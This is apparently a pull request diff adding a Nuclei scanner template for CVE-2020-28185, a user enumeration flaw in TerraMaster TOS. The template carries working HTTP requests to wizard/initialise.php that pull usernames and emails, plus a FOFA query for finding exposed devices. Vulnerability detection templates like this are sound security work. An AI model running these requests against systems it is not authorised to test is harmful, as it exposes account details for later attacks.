Merge pull request #7881 from projectdiscovery/pussycat0x-patch-2

TerraMaster TOS - User Enumeration

http/cves/2020/CVE-2020-28185.yaml

@@ -0,0 +1,55 @@
+id: CVE-2020-28185
+
+info:
+  name: TerraMaster TOS < 4.2.06 - User Enumeration
+  author: pussycat0x
+  severity: medium
+  description: |
+    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
+    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: '"TerraMaster" && header="TOS"'
+  tags: cve,cve2020,tamronos,enum,tos
+
+http:
+  - raw:
+      - |
+        GET /tos/index.php?user/login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wizard/initialise.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}/tos/index.php?user/login
+
+        tab=checkuser&username=admin
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "username"
+          - "email"
+          - "status"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body_2
+        regex:
+          - '"username":"(.*?)"'
+          - '"email":"(.*?)"'